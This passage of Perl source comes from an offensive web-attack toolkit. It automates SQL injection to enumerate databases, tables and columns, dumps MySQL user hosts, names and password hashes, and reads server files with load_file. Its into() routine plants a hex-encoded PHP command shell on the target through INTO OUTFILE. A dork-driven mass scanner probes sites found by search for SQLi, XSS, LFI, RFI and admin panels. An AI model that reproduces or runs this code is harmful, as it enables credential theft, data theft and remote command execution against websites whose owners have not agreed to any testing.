3929 | savefilear( $save . ".txt", "[+] Databases Length : $limita\n" ); | |
3930 | $page1 =~ | |
3931 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3932 | $real = "1"; | |
3933 | for my $limit ( 0 .. $limita ) { | |
3934 | $code = | |
3935 | toma( $page1 | |
3936 | . $pass1 . "from" | |
3937 | . $pass1 | |
3938 | . "information_schema.schemata" | |
3939 | . $pass1 . "limit" | |
3940 | . $pass1 | |
3941 | . $limit . ",1" | |
3942 | . $pass2 ); | |
3943 | if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3944 | my $control = $1; | |
3945 | if ( $control ne "information_schema" | |
3946 | and $control ne "mysql" | |
3947 | and $control ne "phpmyadmin" ) | |
3948 | { | |
3949 | printear( | |
3950 | "[Database $real Found] $control\n", "text", | |
3951 | "7", "5" | |
3952 | ); | |
3953 | savefilear( $save . ".txt", | |
3954 | "[Database $real Found] : $control" ); | |
3955 | $real++; | |
3956 | } | |
3957 | } | |
3958 | } | |
3959 | } | |
3960 | else { | |
3961 | printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" ); | |
3962 | } | |
3963 | } | |
3964 | ||
3965 | sub schematablesdb { | |
3966 | my $page = $_[0]; | |
3967 | my $db = $_[2]; | |
3968 | my $page1 = $page; | |
3969 | savefilear( $_[3] . ".txt", "\n" ); | |
3970 | printear( "\n[+] Searching tables in DB [$db]\n\n", "text", "13", "5" ); | |
3971 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
3972 | savefilear( $_[3] . ".txt", "[DB] : $db" ); | |
3973 | $page =~ | |
3974 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3975 | $page1 =~ | |
3976 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
3977 | $code = | |
3978 | toma( $page1 | |
3979 | . $pass1 . "from" | |
3980 | . $pass1 | |
3981 | . "information_schema.tables" | |
3982 | . $pass1 . "where" | |
3983 | . $pass1 | |
3984 | . "table_schema=char(" | |
3985 | . ascii($db) . ")" | |
3986 | . $pass2 ); | |
3987 | ||
3988 | #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; | |
3989 | if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
3990 | printear( "[+] Tables Length : $1\n\n", "text", "13", "5" ); | |
3991 | savefilear( $_[3] . ".txt", "[+] Tables Length : $1\n" ); | |
3992 | my $limit = $1; | |
3993 | $real = "1"; | |
3994 | for my $lim ( 0 .. $limit ) { | |
3995 | $code1 = | |
3996 | toma( $page | |
3997 | . $pass1 . "from" | |
3998 | . $pass1 | |
3999 | . "information_schema.tables" | |
4000 | . $pass1 . "where" | |
4001 | . $pass1 | |
4002 | . "table_schema=char(" | |
4003 | . ascii($db) . ")" | |
4004 | . $pass1 . "limit" | |
4005 | . $pass1 | |
4006 | . $lim . ",1" | |
4007 | . $pass2 ); | |
4008 | ||
4009 | #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; | |
4010 | if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
4011 | my $table = $1; | |
4012 | chomp $table; | |
4013 | savefilear( $_[3] . ".txt", | |
4014 | "[Table $real Found : $table ]" ); | |
4015 | printear( "[Table $real Found : $table ]\n", | |
4016 | "text", "7", "5" ); | |
4017 | $real++; | |
4018 | } | |
4019 | } | |
4020 | } | |
4021 | else { | |
4022 | printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" ); | |
4023 | } | |
4024 | } | |
4025 | ||
4026 | sub schemacolumnsdb { | |
4027 | my ( $page, $bypass, $db, $table, $save ) = @_; | |
4028 | my $page3 = $page; | |
4029 | my $page4 = $page; | |
4030 | printear( "\n[+] Searching columns in table $table in DB [$db]\n", | |
4031 | "text", "13", "5" ); | |
4032 | savefilear( $save . ".txt", "\n" ); | |
4033 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
4034 | savefilear( $save . ".txt", "\n[DB] : $db" ); | |
4035 | savefilear( $save . ".txt", "[Table] : $table" ); | |
4036 | $page3 =~ | |
4037 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
4038 | $code3 = | |
4039 | toma( $page3 | |
4040 | . $pass1 . "from" | |
4041 | . $pass1 | |
4042 | . "information_schema.columns" | |
4043 | . $pass1 . "where" | |
4044 | . $pass1 | |
4045 | . "table_name=char(" | |
4046 | . ascii($table) . ")" | |
4047 | . $pass1 . "and" | |
4048 | . $pass1 | |
4049 | . "table_schema=char(" | |
4050 | . ascii($db) . ")" | |
4051 | . $pass2 ); | |
4052 | ||
4053 | if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
4054 | printear( "\n[Columns length : $1 ]\n\n", "text", "13", "5" ); | |
4055 | savefilear( $save . ".txt", "[Columns length : $1 ]\n" ); | |
4056 | my $si = $1; | |
4057 | chomp $si; | |
4058 | $page4 =~ | |
4059 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
4060 | $real = "1"; | |
4061 | for my $limit2 ( 0 .. $si ) { | |
4062 | $code4 = | |
4063 | toma( $page4 | |
4064 | . $pass1 . "from" | |
4065 | . $pass1 | |
4066 | . "information_schema.columns" | |
4067 | . $pass1 . "where" | |
4068 | . $pass1 | |
4069 | . "table_name=char(" | |
4070 | . ascii($table) . ")" | |
4071 | . $pass1 . "and" | |
4072 | . $pass1 | |
4073 | . "table_schema=char(" | |
4074 | . ascii($db) . ")" | |
4075 | . $pass1 . "limit" | |
4076 | . $pass1 | |
4077 | . $limit2 . ",1" | |
4078 | . $pass2 ); | |
4079 | if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
4080 | printear( "[Column $real] : $1\n", "text", "7", "5" ); | |
4081 | savefilear( $save . ".txt", "[Column $real] : $1" ); | |
4082 | $real++; | |
4083 | } | |
4084 | } | |
4085 | } | |
4086 | else { | |
4087 | printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" ); | |
4088 | } | |
4089 | } | |
4090 | ||
4091 | sub mysqluser { | |
4092 | my ( $page, $bypass, $save ) = @_; | |
4093 | my $cop = $page; | |
4094 | my $cop1 = $page; | |
4095 | savefilear( $save . ".txt", "\n" ); | |
4096 | printear( "\n[+] Finding mysql.users\n", "text", "13", "5" ); | |
4097 | ( $pass1, $pass2 ) = &bypass($bypass); | |
4098 | $page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/; | |
4099 | $code = | |
4100 | toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 ); | |
4101 | ||
4102 | if ( $code =~ /RATSXPDOWN/ig ) { | |
4103 | $cop1 =~ | |
4104 | s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/; | |
4105 | $code1 = | |
4106 | toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 ); | |
4107 | if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) { | |
4108 | printear( "\n[+] Users Found : $1\n\n", "text", "13", "5" ); | |
4109 | savefilear( $save . ".txt", "\n[+] Users mysql Found : $1\n" ); | |
4110 | for my $limit ( 0 .. $1 ) { | |
4111 | $cop =~ | |
4112 | s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/; | |
4113 | $code = | |
4114 | toma( $cop | |
4115 | . $pass1 . "from" | |
4116 | . $pass1 | |
4117 | . "mysql.user" | |
4118 | . $pass1 . "limit" | |
4119 | . $pass1 | |
4120 | . $limit . ",1" | |
4121 | . $pass2 ); | |
4122 | if ( $code =~ | |
4123 | /RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig | |
4124 | ) | |
4125 | { | |
4126 | printear( "[Host] : $1 [User] : $2 [Password] : $3\n", | |
4127 | "text", "7", "5" ); | |
4128 | savefilear( $save . ".txt", | |
4129 | "[Host] : $1 [User] : $2 [Password] : $3" ); | |
4130 | } | |
4131 | else { | |
4132 | &reload; | |
4133 | } | |
4134 | } | |
4135 | } | |
4136 | } | |
4137 | else { | |
4138 | printear( "\n[-] mysql.user = ERROR\n", "text", "5", "5" ); | |
4139 | } | |
4140 | } | |
4141 | ||
4142 | sub fuzz { | |
4143 | my $page = $_[0]; | |
4144 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
4145 | my $count = "0"; | |
4146 | savefilear( $_[2] . ".txt", "\n" ); | |
4147 | print "\n"; | |
4148 | if ( $_[0] =~ /(.*)hackman(.*)/g ) { | |
4149 | my $start = $1; | |
4150 | my $end = $2; | |
4151 | printear( "[+] Searching tables.....\n\n", "text", "13", "5" ); | |
4152 | for my $table (@buscar2) { | |
4153 | chomp $table; | |
4154 | $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"; | |
4155 | $injection = | |
4156 | $start | |
4157 | . $concat | |
4158 | . $end | |
4159 | . $pass1 . "from" | |
4160 | . $pass1 | |
4161 | . $table | |
4162 | . $pass2; | |
4163 | $code = toma($injection); | |
4164 | if ( $code =~ /ERTOR854/g ) { | |
4165 | $count++; | |
4166 | printear( "[Table Found] : $table\n", "text", "7", "5" ); | |
4167 | savefilear( $_[2] . ".txt", "[Table Found] : $table" ); | |
4168 | } | |
4169 | } | |
4170 | } | |
4171 | if ( $count eq "0" ) { | |
4172 | printear( "[-] Not found any table\n", "text", "5", "5" ); | |
4173 | &reload; | |
4174 | } | |
4175 | } | |
4176 | ||
4177 | sub fuzzcol { | |
4178 | my $page = $_[0]; | |
4179 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
4180 | my $count = "0"; | |
4181 | savefilear( $_[3] . ".txt", "\n" ); | |
4182 | print "\n"; | |
4183 | if ( $_[0] =~ /(.*)hackman(.*)/ ) { | |
4184 | my $start = $1; | |
4185 | my $end = $2; | |
4186 | printear( | |
4187 | "[+] Searching columns for the table [" | |
4188 | . $_[2] . "]" | |
4189 | . " ....\n\n", | |
4190 | "text", "13", "5" | |
4191 | ); | |
4192 | savefilear( $_[3] . ".txt", "[Table] : $_[2]" ); | |
4193 | for my $columns (@buscar1) { | |
4194 | chomp $columns; | |
4195 | $concat = | |
4196 | "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))"; | |
4197 | $code = | |
4198 | toma( $start | |
4199 | . $concat | |
4200 | . $end | |
4201 | . $pass1 . "from" | |
4202 | . $pass1 | |
4203 | . $_[2] | |
4204 | . $pass2 ); | |
4205 | if ( $code =~ /ERTOR854/g ) { | |
4206 | $count++; | |
4207 | printear( "[Column Found] : $columns\n", "text", "7", "5" ); | |
4208 | savefilear( $_[3] . ".txt", "[Column Found] : $columns" ); | |
4209 | } | |
4210 | } | |
4211 | } | |
4212 | if ( $count eq "0" ) { | |
4213 | printear( "[-] Not found any column\n", "text", "5", "5" ); | |
4214 | &reload; | |
4215 | } | |
4216 | } | |
4217 | ||
4218 | sub load { | |
4219 | savefilear( $_[2] . ".txt", "\n" ); | |
4220 | print "\n"; | |
4221 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
4222 | if ( $_[0] =~ /(.*)hackman(.*)/g ) { | |
4223 | printear( | |
4224 | "[+] Searching files with load_file...\n\n", "text", | |
4225 | "13", "5" | |
4226 | ); | |
4227 | my $start = $1; | |
4228 | my $end = $2; | |
4229 | for my $file (@files) { | |
4230 | chomp $file; | |
4231 | $concat = | |
4232 | "unhex(hex(concat(char(107,48,98,114,97),load_file(" | |
4233 | . encode($file) | |
4234 | . "),char(107,48,98,114,97))))"; | |
4235 | my $code = toma( $start . $concat . $end . $pass2 ); | |
4236 | chomp $code; | |
4237 | if ( $code =~ /k0bra(.*)k0bra/s ) { | |
4238 | printear( "[File Found] : $file\n", "text", "11", "5" ); | |
4239 | printear( "\n[Source Start]\n\n", "text", "7", "5" ); | |
4240 | printear( "$1", "text", "7", "5" ); | |
4241 | printear( "\n\n[Source End]\n\n", "text", "7", "5" ); | |
4242 | savefilear( $_[2] . ".txt", "[File Found] : $file" ); | |
4243 | savefilear( $_[2] . ".txt", "\n[Source Start]\n" ); | |
4244 | savefilear( $_[2] . ".txt", "$1" ); | |
4245 | savefilear( $_[2] . ".txt", "\n[Source End]\n" ); | |
4246 | } | |
4247 | } | |
4248 | } | |
4249 | } | |
4250 | ||
4251 | sub loadfile { | |
4252 | savefilear( $_[2] . ".txt", "\n" ); | |
4253 | ( $pass1, $pass2 ) = &bypass( $_[1] ); | |
4254 | if ( $_[0] =~ /(.*)hackman(.*)/g ) { | |
4255 | my $start = $1; | |
4256 | my $end = $2; | |
4257 | my $file = printear( "\n[+] File to read : ", "stdin", "11", "13" ); | |
4258 | $concat = | |
4259 | "unhex(hex(concat(char(107,48,98,114,97),load_file(" | |
4260 | . encode($file) | |
4261 | . "),char(107,48,98,114,97))))"; | |
4262 | my $code = toma( $start . $concat . $end . $pass2 ); | |
4263 | chomp $code; | |
4264 | if ( $code =~ /k0bra(.*)k0bra/s ) { | |
4265 | printear( "\n[File Found] : $file\n", "text", "11", "5" ); | |
4266 | printear( "\n[Source Start]\n\n", "text", "7", "5" ); | |
4267 | printear( "$1", "text", "7", "5" ); | |
4268 | printear( "\n\n[Source End]\n\n", "text", "7", "5" ); | |
4269 | savefilear( $_[2] . ".txt", "[File Found] : $file" ); | |
4270 | savefilear( $_[2] . ".txt", "\n[Source Start]\n" ); | |
4271 | savefilear( $_[2] . ".txt", "$1" ); | |
4272 | savefilear( $_[2] . ".txt", "\n[Source End]\n" ); | |
4273 | } | |
4274 | } | |
4275 | } | |
4276 | ||
4277 | sub dump { | |
4278 | savefilear( $_[5] . ".txt", "\n" ); | |
4279 | my $page = $_[0]; | |
4280 | ( $pass1, $pass2 ) = &bypass( $_[4] ); | |
4281 | if ( $page =~ /(.*)hackman(.*)/ ) { | |
4282 | my $start = $1; | |
4283 | my $end = $2; | |
4284 | printear( "[+] Extracting values...\n", "text", "13", "5" ); | |
4285 | $concatx = | |
4286 | "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; | |
4287 | $val_code = | |
4288 | toma( $start | |
4289 | . $concatx | |
4290 | . $end | |
4291 | . $pass1 . "from" | |
4292 | . $pass1 | |
4293 | . $_[3] | |
4294 | . $pass2 ); | |
4295 | $concat = | |
4296 | "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; | |
4297 | if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) { | |
4298 | $tota = $1; | |
4299 | printear( | |
4300 | "\n[+] Length of the rows : $tota\n\n", "text", | |
4301 | "13", "5" | |
4302 | ); | |
4303 | printear( "[+] Extracting values...\n\n", "text", "13", "5" ); | |
4304 | printear( "[$_[1]] [$_[2]]\n\n", "text", "13", "5" ); | |
4305 | savefilear( $_[5] . ".txt", "[Table] : $_[3]" ); | |
4306 | savefilear( $_[5] . ".txt", "[+] Length of the rows: $tota\n" ); | |
4307 | savefilear( $_[5] . ".txt", "[$_[1]] [$_[2]]\n" ); | |
4308 | for my $limit ( 0 .. $tota ) { | |
4309 | chomp $limit; | |
4310 | $injection = | |
4311 | toma( $start | |
4312 | . $concat | |
4313 | . $end | |
4314 | . $pass1 . "from" | |
4315 | . $pass1 | |
4316 | . $_[3] | |
4317 | . $pass1 . "limit" | |
4318 | . $pass1 | |
4319 | . $limit . ",1" | |
4320 | . $pass2 ); | |
4321 | if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) { | |
4322 | savefilear( $_[5] . ".txt", | |
4323 | "[$_[1]] : $1 [$_[2]] : $2" ); | |
4324 | printear( | |
4325 | "[$_[1]] : $1 [$_[2]] : $2\n", "text", | |
4326 | "7", "5" | |
4327 | ); | |
4328 | } | |
4329 | else { | |
4330 | printear( "\n[+] Extracting Finish\n", | |
4331 | "text", "13", "5" ); | |
4332 | &reload; | |
4333 | } | |
4334 | } | |
4335 | } | |
4336 | else { | |
4337 | printear( "[-] Not Found any DATA\n\n", "text", "5", "5" ); | |
4338 | } | |
4339 | } | |
4340 | } | |
4341 | ||
4342 | sub into { | |
4343 | printear( "\n[Status] : Injecting a SQLI for create a shell\n", | |
4344 | "text", "13", "5" ); | |
4345 | my ( $page, $bypass, $dir, $save ) = @_; | |
4346 | savefilear( $save . ".txt", "\n" ); | |
4347 | print "\n"; | |
4348 | ( $pass1, $pass2 ) = &bypass($bypass); | |
4349 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page); | |
4350 | if ( $path =~ /\/(.*)$/ ) { | |
4351 | my $path1 = $1; | |
4352 | my $path2 = $path1; | |
4353 | $path2 =~ s/$1//; | |
4354 | $dir =~ s/$path1//ig; | |
4355 | $shell = $dir . "/" . "shell.php"; | |
4356 | if ( $page =~ /(.*)hackman(.*)/ig ) { | |
4357 | my ( $start, $end ) = ( $1, $2 ); | |
4358 | $code = | |
4359 | toma( $start | |
4360 | . "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" | |
4361 | . $end | |
4362 | . $pass1 . "into" | |
4363 | . $pass1 | |
4364 | . "outfile" | |
4365 | . $pass1 . "'" | |
4366 | . $shell . "'" | |
4367 | . $pass2 ); | |
4368 | $code1 = | |
4369 | toma( "http://" . $auth . "/" . $path2 . "/" . "shell.php" ); | |
4370 | if ( $code1 =~ /Mini Shell By Doddy/ig ) { | |
4371 | printear( | |
4372 | "[Shell Up] : http://" | |
4373 | . $auth . "/" | |
4374 | . $path2 . "/" | |
4375 | . "shell.php" . "\a\a", | |
4376 | "text", "7", "5" | |
4377 | ); | |
4378 | savefilear( | |
4379 | $save . ".txt", | |
4380 | "[shell up] : http://" | |
4381 | . $auth . "/" | |
4382 | . $path2 . "/" | |
4383 | . "shell.php" | |
4384 | ); | |
4385 | } | |
4386 | else { | |
4387 | printear( "[Shell] : Not Found", "text", "5", "5" ); | |
4388 | } | |
4389 | } | |
4390 | } | |
4391 | } | |
4392 | ||
4393 | } ## | |
4394 | ||
4395 | sub load_paranoic_old { | |
4396 | ||
4397 | installer_par(); | |
4398 | staq(); | |
4399 | ||
4400 | sub staq { | |
4401 | ||
4402 | sub head_scan { | |
4403 | clean(); | |
4404 | printear( " | |
4405 | ||
4406 | ||
4407 | @@@ @@@@ @ @ @ @ @ @@@@@ @@@@@ | |
4408 | @ @ @ @ @ @@ @ @@ @ @ @ @ | |
4409 | @ @ @ @ @@ @ @@ @ @ @ @ | |
4410 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
4411 | @@@ @ @ @ @ @ @ @ @ @ @@@@ @@@@@ | |
4412 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
4413 | @ @ @@@@@ @ @@ @ @@ @ @ @ | |
4414 | @ @ @ @@ @ @ @@ @ @@ @ @ @ | |
4415 | @@@ @@@@ @ @ @ @ @ @ @@@@@ @ @ | |
4416 | ||
4417 | ||
4418 | ||
4419 | ||
4420 | ", "logos", "7", "5" ); | |
4421 | } | |
4422 | ||
4423 | &menu_sca; | |
4424 | ||
4425 | sub menu_sca { | |
4426 | &head_scan; | |
4427 | printear( "[a] : Scan a File\n", "text", "13", "5" ); | |
4428 | printear( | |
4429 | "[b] : Search in Google and scan the webs\n", "text", | |
4430 | "13", "5" | |
4431 | ); | |
4432 | printear( | |
4433 | "[c] : Search in Bing and scan the webs\n", "text", | |
4434 | "13", "5" | |
4435 | ); | |
4436 | printear( "[d] : Exit\n\n", "text", "13", "5" ); | |
4437 | my $op = printear( "[option] : ", "stdin", "11", "13" ); | |
4438 | ||
4439 | scan($op); | |
4440 | ||
4441 | } | |
4442 | ||
4443 | sub scan { | |
4444 | ||
4445 | my $count; | |
4446 | my $option; | |
4447 | my $op = shift; | |
4448 | my @paginas; | |
4449 | ||
4450 | if ( $op =~ /a/ig ) { | |
4451 | ||
4452 | my $word = printear( "\n[+] Wordlist : ", "stdin", "11", "13" ); | |
4453 | ||
4454 | @paginas = repes( cortar( savewordss($word) ) ); | |
4455 | ||
4456 | $option = &men; | |
4457 | ||
4458 | if ( $option =~ /Q/ig ) { | |
4459 | $count = | |
4460 | printear( "\n[+] Panels Count : ", "stdin", "11", "13" ); | |
4461 | } | |
4462 | ||
4463 | } | |
4464 | ||
4465 | elsif ( $op =~ /b/ig ) { | |
4466 | ||
4467 | my $dork = printear( "\n[+] Dork : ", "stdin", "11", "13" ); | |
4468 | my $pag = printear( "\n[+] Pages : ", "stdin", "11", "13" ); | |
4469 | $option = &men; | |
4470 | ||
4471 | if ( $option =~ /Q/ig ) { | |
4472 | $count = | |
4473 | printear( "\n[+] Panels Count : ", "stdin", "11", "13" ); | |
4474 | } | |
4475 | ||
4476 | printear( "\n[+] Searching in Google ...\n", "text", "13", | |
4477 | "5" ); | |
4478 | ||
4479 | @paginas = &google( $dork, $pag ); | |
4480 | ||
4481 | } | |
4482 | ||
4483 | elsif ( $op =~ /c/ig ) { | |
4484 | my $dork = printear( "\n[+] Dork : ", "stdin", "11", "13" ); | |
4485 | my $pag = printear( "\n[+] Pages : ", "stdin", "11", "13" ); | |
4486 | $option = &men; | |
4487 | ||
4488 | if ( $option =~ /Q/ig ) { | |
4489 | $count = | |
4490 | printear( "\n[+] Panels Count : ", "stdin", "11", "13" ); | |
4491 | } | |
4492 | ||
4493 | printear( "\n[+] Searching in Bing ...\n", "text", "13", "5" ); | |
4494 | ||
4495 | @paginas = &bing( $dork, $pag ); | |
4496 | ||
4497 | } | |
4498 | ||
4499 | elsif ( $op =~ /d/ig ) { | |
4500 | estoydentroporahora(); | |
4501 | } | |
4502 | ||
4503 | else { | |
4504 | &finish_now; | |
4505 | } | |
4506 | ||
4507 | printear( "\n[+] Scanning [" . int(@paginas) . "] pages ...\n\n", | |
4508 | "text", "7", "5" ); | |
4509 | ||
4510 | $total_vulnerables = "0"; | |
4511 | ||
4512 | for (@paginas) { | |
4513 | if ( $option =~ /S/ig ) { | |
4514 | scansql($_); | |
4515 | } | |
4516 | if ( $option =~ /K/ig ) { | |
4517 | sql($_); | |
4518 | } | |
4519 | if ( $option =~ /Q/ig ) { | |
4520 | sqladmin( $_, $count ); | |
4521 | } | |
4522 | if ( $option =~ /Y/ig ) { | |
4523 | simple($_); | |
4524 | } | |
4525 | if ( $option =~ /L/ig ) { | |
4526 | lfi($_); | |
4527 | } | |
4528 | if ( $option =~ /R/ig ) { | |
4529 | rfi($_); | |
4530 | } | |
4531 | if ( $option =~ /F/ig ) { | |
4532 | fsd($_); | |
4533 | } | |
4534 | if ( $option =~ /X/ig ) { | |
4535 | scanxss($_); | |
4536 | } | |
4537 | if ( $option =~ /M/ig ) { | |
4538 | mssql($_); | |
4539 | } | |
4540 | if ( $option =~ /J/ig ) { | |
4541 | access($_); | |
4542 | } | |
4543 | if ( $option =~ /O/ig ) { | |
4544 | oracle($_); | |
4545 | } | |
4546 | if ( $option =~ /HT/ig ) { | |
4547 | http($_); | |
4548 | } | |
4549 | if ( $option =~ /A/ig ) { | |
4550 | scansql($_); | |
4551 | scanxss($_); | |
4552 | mssql($_); | |
4553 | access($_); | |
4554 | oracle($_); | |
4555 | lfi($_); | |
4556 | rfi($_); | |
4557 | fsd($_); | |
4558 | http($_); | |
4559 | } | |
4560 | } | |
4561 | } | |
4562 | printear( "\n[+] Vulnerable pages found : " . $total_vulnerables . "\n", | |
4563 | "text", "13", "5" ); | |
4564 | &finish_now; | |
4565 | } | |
4566 | ||
4567 | sub sql { | |
4568 | my ( $pass1, $pass2 ) = ( "+", "--" ); | |
4569 | my $page = shift; | |
4570 | $code1 = | |
4571 | toma( $page . "-1" | |
4572 | . $pass1 . "union" | |
4573 | . $pass1 | |
4574 | . "select" | |
4575 | . $pass1 . "666" | |
4576 | . $pass2 ); | |
4577 | if ( $code1 =~ | |
4578 | /The used SELECT statements have a different number of columns/ig ) | |
4579 | { | |
4580 | printear( "[+] SQLI : $page\a\n", "text", "11", "5" ); | |
4581 | $total_vulnerables++; | |
4582 | savefile( "sql-logs.txt", $page ); | |
4583 | } | |
4584 | } | |
4585 | ||
4586 | sub sqladmin { | |
4587 | ||
4588 | my ( $pass1, $pass2 ) = ( "+", "--" ); | |
4589 | ||
4590 | my $page = $_[0]; | |
4591 | my $limite = $_[1]; | |
4592 | ||
4593 | if ( $limite eq "" ) { | |
4594 | $limite = 3; | |
4595 | } | |
4596 | ||
4597 | $code1 = | |
4598 | toma( $page . "-1" | |
4599 | . $pass1 . "union" | |
4600 | . $pass1 | |
4601 | . "select" | |
4602 | . $pass1 . "666" | |
4603 | . $pass2 ); | |
4604 | if ( $code1 =~ | |
4605 | /The used SELECT statements have a different number of columns/ig ) | |
4606 | { | |
4607 | printear( "\n[+] SQLI : $page\a\n", "text", "11", "5" ); | |
4608 | $total_vulnerables++; | |
4609 | savefile( "sql-logs.txt", $page ); | |
4610 | ||
4611 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page); | |
4612 | ||
4613 | my $fage = "http://" . $auth; | |
4614 | ||
4615 | my $count = 0; | |
4616 | ||
4617 | for my $path (@paneles) { | |
4618 | ||
4619 | if ( $count eq $limite ) { | |
4620 | last; | |
4621 | } | |
4622 | ||
4623 | $code = tomados( $fage . "/" . $path ); | |
4624 | ||
4625 | if ( $code->is_success ) { | |
4626 | $controlt = 1; | |
4627 | $count++; | |
4628 | printear( | |
4629 | "[+] Link : " . $fage . "/" . $path . "\n", "text", | |
4630 | "11", "5" | |
4631 | ); | |
4632 | savefile( "admin-logs.txt", $fage . "/" . $path ); | |
4633 | } | |
4634 | } | |
4635 | } | |
4636 | ||
4637 | } | |
4638 | ||
4639 | sub http { | |
4640 | ||
4641 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); | |
4642 | ||
4643 | my $code = $nave->get( $_[0] ); | |
4644 | ||
4645 | if ( $_[0] =~ /http:\/\// ) { | |
4646 | ||
4647 | printear( "\n[+] Page : $auth", "text", "11", "5" ); | |
4648 | printear( "\n[+] Date : " . $code->header('date'), | |
4649 | "text", "11", "5" ); | |
4650 | printear( | |
4651 | "\n[+] Server : " . $code->header('server'), "text", | |
4652 | "11", "5" | |
4653 | ); | |
4654 | printear( "\n[+] Connection : " . $code->header('connection'), | |
4655 | "text", "11", "5" ); | |
4656 | printear( | |
4657 | "\n[+] Content-Type : " . $code->header('content-type') . "\n", | |
4658 | "text", "11", "5" | |
4659 | ); | |
4660 | ||
4661 | savefile( "http-logs.txt", "\n[+] Page : $auth" ); | |
4662 | savefile( "http-logs.txt", "[+] Date : " . $code->header('date') ); | |
4663 | savefile( "http-logs.txt", | |
4664 | "[+] Server : " . $code->header('server') ); | |
4665 | savefile( "http-logs.txt", | |
4666 | "[+] Connection : " . $code->header('connection') ); | |
4667 | savefile( "http-logs.txt", | |
4668 | "[+] Content-Type : " . $code->header('content-type') ); | |
4669 | ||
4670 | } | |
4671 | ||
4672 | } | |
4673 | ||
4674 | sub scanxss { | |
4675 | ||
4676 | my $page = $_[0]; | |
4677 | my $espacio_scan; | |
4678 | chomp $page; | |
4679 | ||
4680 | if ( $_[1] eq "yes" ) { | |
4681 | $espacio_scan = "\n"; | |
4682 | } | |
4683 | ||
4684 | my @testar = HTML::Form->parse( toma($page), "/" ); | |
4685 | my @botones_names; | |
4686 | my @botones_values; | |
4687 | my @orden; | |
4688 | my @pa = ( | |
4689 | "<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>", | |
4690 | '"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>' | |
4691 | ); | |
4692 | my @get_founds; | |
4693 | my @post_founds; | |
4694 | my @ordenuno; | |
4695 | my @ordendos; | |
4696 | my @valores; | |
4697 | ||
4698 | my $contador_forms = 0; | |
4699 | ||
4700 | my $valor = "doddyhackman"; | |
4701 | ||
4702 | for my $test (@testar) { | |
4703 | $contador_forms++; | |
4704 | if ( $test->method eq "POST" ) { | |
4705 | my @inputs = $test->inputs; | |
4706 | for my $in (@inputs) { | |
4707 | if ( $in->type eq "submit" ) { | |
4708 | if ( $in->name eq "" ) { | |
4709 | push( @botones_names, "submit" ); | |
4710 | } | |
4711 | push( @botones_names, $in->name ); | |
4712 | push( @botones_values, $in->value ); | |
4713 | } | |
4714 | else { | |
4715 | push( @ordenuno, $in->name, $pa[0] ); | |
4716 | push( @valores, $in->name ); | |
4717 | push( @ordendos, $in->name ); | |
4718 | } | |
4719 | } | |
4720 | ||
4721 | for my $n ( 0 .. int(@botones_names) - 1 ) { | |
4722 | my @preuno = @ordenuno; | |
4723 | my @predos = @ordendos; | |
4724 | push( @preuno, $botones_names[$n], $botones_values[$n] ); | |
4725 | push( @predos, $botones_names[$n], $botones_values[$n] ); | |
4726 | ||
